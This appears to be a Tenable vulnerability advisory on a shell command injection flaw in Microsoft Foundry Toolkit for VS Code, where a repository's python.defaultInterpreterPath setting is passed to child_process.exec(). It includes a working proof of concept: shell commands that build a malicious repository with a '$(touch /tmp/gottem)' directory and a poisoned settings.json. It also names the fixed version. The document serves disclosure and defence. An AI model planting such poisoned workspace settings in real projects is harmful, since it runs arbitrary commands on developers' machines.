Synopsis
Microsoft Foundry Toolkit for VS Code (formerly AI Toolkit for VS Code) uses child_process.exec() with string interpolation to build shell commands that include a Python interpreter path obtained from the Python extension API (ms-python.python via getExecutionDetails()).
The interpreter path can be controlled by a repository through .vscode/settings.json (python.defaultInterpreterPath). On Linux/macOS, this can be abused for shell command injection because the extension wraps the path in double quotes and passes it to exec() (which invokes a shell). Command substitution such as $(...) is evaluated inside double quotes by POSIX shells.
Proof of Concept
I validated arbitrary command execution on AI Toolkit version 0.31.2026021209 by pointing python.defaultInterpreterPath to a real Python interpreter located under a directory whose literal name contains $(touch /tmp/gottem).
Create the PoC repository and files:
mkdir -p malicious-project/.aitk malicious-project/.vscode
echo '{}' > malicious-project/.aitk/config.json
mkdir -p 'malicious-project/$(touch /tmp/gottem)'
ln -sf /usr/bin/python3 'malicious-project/$(touch /tmp/gottem)/python3'
Set the poisoned interpreter path using the absolute repository path:
REPO_PATH="$(cd malicious-project && pwd)"
# Note: \$ escapes the dollar sign so the literal string $(touch ...)
# ends up in the JSON, while ${REPO_PATH} expands to the real path.
cat > malicious-project/.vscode/settings.json << JSONEOF
{
"python.defaultInterpreterPath": "${REPO_PATH}/\$(touch /tmp/gottem)/python3"
}
JSONEOF
Open the repository in VS Code with AI Toolkit and Python extension installed:
code malicious-project/
In VS Code, click the AI Toolkit Testing view in the sidebar (the potion icon).
In the AI Toolkit Testing panel, click Run Evaluation in Foundry (this reaches pytest --collect-evals). No other files need to be opened first; the Python extension resolves the interpreter path from workspace settings when AI Toolkit requests it.
Verify execution:
ls -la /tmp/gottem
Solution
Upgrade to version 0.32.0 or later.
Additional References
https://marketplace.visualstudio.com/items?itemName=ms-windows-ai-studio.windows-ai-studio
Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]